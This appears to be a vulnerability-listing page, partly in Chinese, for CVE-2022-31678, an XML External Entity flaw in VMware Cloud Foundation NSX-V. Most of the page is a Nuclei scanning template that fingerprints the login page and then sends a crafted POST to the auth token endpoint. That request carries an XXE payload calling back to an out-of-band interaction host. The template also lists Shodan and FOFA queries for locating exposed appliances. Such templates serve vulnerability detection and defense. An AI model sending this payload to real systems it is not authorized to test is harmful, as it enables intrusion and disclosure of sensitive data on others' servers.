CVE-2022-31678: VMWare Cloud Foundation NSX-V - XML External Entity (XXE)

日期: 2026-02-04 | 影响软件: 未知 | POC: 已公开

漏洞描述

VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.

PoC代码[已公开]

id: CVE-2022-31678

info:
  name: VMWare Cloud Foundation NSX-V - XML External Entity (XXE)
  author: daffainfo
  severity: critical
  description: |
    VMware Cloud Foundation (NSX-V) contains an XML External Entity (XXE) vulnerability. On VCF 3.x instances with NSX-V deployed, this may allow a user to exploit this issue leading to a denial-of-service condition or unintended information disclosure.
  impact: |
    Attackers can cause denial-of-service or access sensitive information by exploiting XXE vulnerability.
  remediation: |
    Update to the latest version of VMware Cloud Foundation with patched NSX-V component.
  reference:
    - https://srcincite.io/advisories/src-2022-0022/
    - https://www.vmware.com/security/advisories/VMSA-2022-0027.html
    - https://nvd.nist.gov/vuln/detail/cve-2022-31678
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:H
    cvss-score: 9.1
    cve-id: CVE-2022-31678
    cwe-id: CWE-611
    epss-score: 0.0314
    epss-percentile: 0.86486
    cpe: cpe:2.3:a:vmware:cloud_foundation:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: vmware
    product: cloud_foundation
    shodan-query: title:"VMware Appliance Management"
    fofa-query: title="VMware Appliance Management"
  tags: cve,cve2022,vmware,nsx,xxe,vkev,kev

flow: http(1) && http(2)

http:
  - method: GET
    path:
      - "{{BaseURL}}/login.jsp"

    matchers:
      - type: word
        part: body
        words:
          - "<title>VMware Appliance Management"
        internal: true

  - raw:
      - |
        POST /api/3.0/services/auth/token HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0"?>
        <!DOCTYPE r [
          <!ENTITY xxe SYSTEM "http://{{interactsh-url}}">
        ]>
        <request>
          <username>&xxe;</username>
          <password>{{randstr}}</password>
        </request>

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"

      - type: word
        part: body
        words:
          - "Bad Username or Credentials presented"

      - type: status
        status:
          - 403
# digest: 4a0a004730450220462f619364ad10b3b77d1ca5029ba3eb5cd03a71c2d76067bafcc8cdcc6fb81b022100d6de0207504f9f0fcb2fcf37583adb8406adf4bbdb6cfe5fbbd06d9e10de76c8:922c64590222798bb761d5b6d8e72950